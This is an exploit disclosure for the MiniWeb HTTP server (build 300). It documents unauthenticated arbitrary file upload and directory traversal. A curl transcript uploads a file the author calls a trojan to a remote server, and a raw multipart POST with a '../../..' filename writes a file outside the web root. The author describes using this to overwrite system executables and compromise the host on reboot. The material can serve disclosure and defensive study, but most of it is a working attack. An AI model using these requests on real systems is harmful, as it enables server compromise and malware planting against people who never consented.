============================================================================================
Vulnerable Software: MiniWeb (build 300, built on Feb 28 2013)
Official Site: http://miniweb.sourceforge.net/
Vulns: Remote arbitrary file upload,Directory traversal.
Tested Software/version: MiniWeb (build 300, built on Feb 28 2013)
Tested on: Windows XP SP2 32 bit.
=================================About software:===========================================
MiniWeb is a mini HTTP server implementation written in C language, featuring low system resource consumption,
high efficiency, good flexibility and high portability. It is capable to serve multiple clients with a single thread,
supporting GET and POST methods, authentication,
dynamic contents (dynamic web page and page variable substitution) and file uploading.
MiniWeb runs on POSIX complaint OS, like Linux, as well as Microsoft Windows (Cygwin, MinGW and native build with Visual Studio).
The binary size of MiniWeb can be as small as 20KB (on x86 Linux). The target of the project is to provide a fast,
functional and low resource consuming HTTP server that is embeddable in other applications (as a static or dynamic library)
as well as a standalone web server.
MiniWeb supports transparent 7-zip decompression. Web contents can be compressed into
7-zip archieves and clients can access the contents inside the 7-zip archive just like in a directory.
MiniWeb can also be used in audio/video streaming applications,
or more specific, VOD (video-on-demand) service. Currently a VOD client/server is being developed on MiniWeb.
============================================================================================
About vulns:
This software suffers from 2 critical vulns:
Any remote/local user can upload arbitrary files to web server.
Proof of concept:
In this scenario using cygwin +curl remote attacker uploads troyan called "taskmgr.exe" to remote web server.
user@myhost /cygdrive/c/dir1/dir2
$ ipconfig
Íàñòðîéêà ïðîòîêîëà IP äëÿ Windows
Ïîäêëþ÷åíèå ïî ëîêàëüíîé ñåòè - Ethernet àäàïòåð:
Ñîñòîÿíèå ñåòè . . . . . . . . . : ñåòü îòêëþ÷åíà
VirtualBox Host-Only Network - Ethernet àäàïòåð:
DNS-ñóôôèêñ ýòîãî ïîäêëþ÷åíèÿ . . :
IP-àäðåñ . . . . . . . . . . . . : 192.168.0.1
Ìàñêà ïîäñåòè . . . . . . . . . . : 255.255.255.0
Îñíîâíîé øëþç . . . . . . . . . . : 192.168.0.1
user@myhost /cygdrive/c/dir1/dir2
$ curl -I 192.168.0.15:8000
curl: (52) Empty reply from server
user@myhost /cygdrive/c/dir1/dir2
$ curl 192.168.0.15:8000
<html><head><title>/</title></head><body><table border=0 cellpadding=0 cellspacing=0 width=100%><h2>Directory of /</h2><hr><tr><td
width=35%><a href='../'>..</a></td><td width=15%><dir></td><td width=15%></td><td>Sat, 06 Apr 2013 23:55:29 GMT</td></tr></
table><hr><i>Directory content generated by MiniWeb</i></body></html>
user@myhost /cygdrive/c/dir1/dir2
$ #Uploading remotely our troyan to remote system.
user@myhost /cygdrive/c/dir1/dir2
$ curl -i -F name=taskmgr.exe -F filedata=@taskmgr.exe http://192.168.0.15:8000/epicfail/
HTTP/1.1 404 Not Found
Server: MiniWeb
Content-length: 125
Content-Type: text/html
<html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL has no content.</p></body></html>
user@myhost /cygdrive/c/dir1/dir2
$ #Now fetching directory index from remote system.
user@myhost /cygdrive/c/dir1/dir2
$ curl 192.168.0.15:8000
<html><head><title>/</title></head><body><table border=0 cellpadding=0 cellspacing=0 width=100%><h2>Directory of /</h2><hr><tr><td
width=35%><a href='../'>..</a></td><td width=15%><dir></td><td width=15%></td><td>Sat, 06 Apr 2013 23:55:29 GMT</td></tr><t
r><td width=35%><a href='taskmgr.exe'>taskmgr.exe</a></td><td width=15%>329 KB</td><td width=15%>exe file</td><td>Sun, 07 Apr 2013
00:14:38 GMT</td></tr></table><hr><i>Directory content generated by MiniWeb</i></body></html>
user@myhost /cygdrive/c/dir1/dir2
user@myhost /cygdrive/c/dir1/dir2
$ #Lol our troyan (taskmgr.exe) uploaded successfully) This is design flaw.
user@myhost /cygdrive/c/dir1/dir2
$ curl 192.168.0.15:8000/taskmgr.exe>task2.exe
user@myhost /cygdrive/c/dir1/dir2
$ file task2.exe
task2.exe: PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
user@myhost /cygdrive/c/dir1/dir2
$ rm -rf task2.exe
So,this means any remote user can upload,can spoof,can overwrite any files on remote server.
Moreover this web server software contains directory traversal vuln.
Using the second vuln this is possible to upload any troyan outside of document root to Operation System + spoof some system executables and as result
compromise remote operation system in eg on next reboot when it starts.
In this case attacker uses FIddler:
================================================================================
METHOD: POST
URL: http://192.168.0.15:8000/AAAAAAAAAAAAAAAAAAAAAAA
Host: 192.168.0.15:8000
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:20.0) Gecko/20100101 Firefox/20.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------78522398122376
Content-Length: 84906
request body:
-----------------------------78522398122376
Content-Disposition: form-data; name="user"
-----------------------------78522398122376
Content-Disposition: form-data; name="pass"
-----------------------------78522398122376
Content-Disposition: form-data; name="file"; filename="../../../../../../../../../../../../../OWNED_BY_AKASTEP.txt"
Content-Type: image/png
Dude! Your machine OwnEd!
-----------------------------78522398122376
Content-Disposition: form-data; name="button"
Upload
-----------------------------78522398122376--
================================================================================
Few Printscreens:
1remotesystem.PNG
http://s019.radikal.ru/i612/1304/09/510e3b430b04.png
2attackersends.PNG
http://s017.radikal.ru/i406/1304/a1/494cef4de6f0.png
3remotesystempwned.PNG
http://s05.radikal.ru/i178/1304/f3/5fe4d9cb2111.png
================================================
KUDOSSSSSSS
================================================
packetstormsecurity.org
packetstormsecurity.com
packetstormsecurity.net
securityfocus.com
cxsecurity.com
security.nnov.ru
securtiyvulns.com
securitylab.ru
secunia.com
securityhome.eu
exploitsdownload.com
osvdb.com
websecurity.com.ua
1337day.com
itsecuritysolutions.org
waraxe.us
exploit-db.com
to all Aa Team + to all Azerbaijan Black HatZ
+ *Especially to my bro CAMOUFL4G3 *
To All Turkish Hackers+ ottoman38 & HERO_AZE
*Super special KUDOS to my bro Brendan Coles!
Love you and Respect you dude!
Thank you!*
================================================
/AkaStep
+Rep.
